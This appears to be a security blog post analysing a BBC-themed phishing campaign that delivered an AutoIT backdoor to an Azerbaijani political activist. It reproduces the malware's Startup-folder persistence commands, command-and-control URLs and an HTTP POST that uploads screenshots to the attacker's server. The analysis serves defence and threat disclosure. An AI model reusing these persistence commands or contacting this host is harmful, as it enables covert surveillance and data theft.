Yet another targeted malware against Azerbajani political activists

17 February 2022

The 15th of February, a political activist from Azerbaijan received an e-mail claiming to be from the BBC. The mail had the subject “BBC Suallar” (BBC Questions).

The mail included a link to a RAR compressed file in Google Drive that once downloaded required a password to be decrypted. The password to decrypt the file was included in the phishing e-mail: “bbc”. Compressed files that are password protected are common in malware phishing attacks as the files can not be scanned by antivirus.

1c94f1c6241cb598da5da7150a0dc541 suallar.scr
7fffbc35decc16525e5464bfd2e5b0c5  BBC-suallar.rar

Once the file is executed, a Word Document about SMM (Social Media Marketing) is displayed. But what is happening behind the scenes?

The suallar.scr file is a malware written in AutoIT, the malware is responsible to launch the Word Document but also installs a persistent backdoor in the system

%appdata% & copy /b "C:\Users\QMA\AppData\Local\Temp\EnvGroupPolicy.Exe" "C:\Users\QMA\AppData\Roaming\group_policy_deploy\EnvGroupPolicy.Exe"
%homepath% & copy /b "C:\Users\QMA\AppData\Local\Temp\EnvGroupPolicy.Exe" "C:\Users\HAPUBWS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" && attrib +h +r +s "C:\Users\QMA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

The software connects to the domain name smartappsfoursix{.}xyz to download the rest of his software requirements. It downloads gpoupdater.exe and libcurl.dll that look responsible of uploading files to the command and control server. During the execution of the malware several (10) screenshoots of the Desktop were uploaded to the server.

smartappsfoursix{.}xyz/ip.php
smartappsfoursix{.}xyz/upload.php
smartappsfoursix{.}xyz/requirements/up/bin/gpoupdater.exe
smartappsfoursix{.}xyz/requirements/up/bin/libcurl.dll
...

POST  //upload.php?GUID=xxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx HTTP/1.1
Host:  smartappsfoursix.xyz
User-Agent: Mozilla/5.0 (Windows NT 11.0; rv:56.0)  Gecko/20110101 Firefox/98.0.1
Accept: */*
Content-Length:  22829
Content-Type: multipart/form-data;  
Content-Disposition:  form-data; name="file";  filename="_screenshot_12345.123456789.jpg"Content-Type: image/jpeg

De-compiling the Suallar AutoIT Malware

Thanks to AutoIT Ripper from Michał from CERT Polska, we could have a look inside of the malware and confirm the domain used as command and control “smartappsfoursix{.}xyz”

Cookie	Duration	Description
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.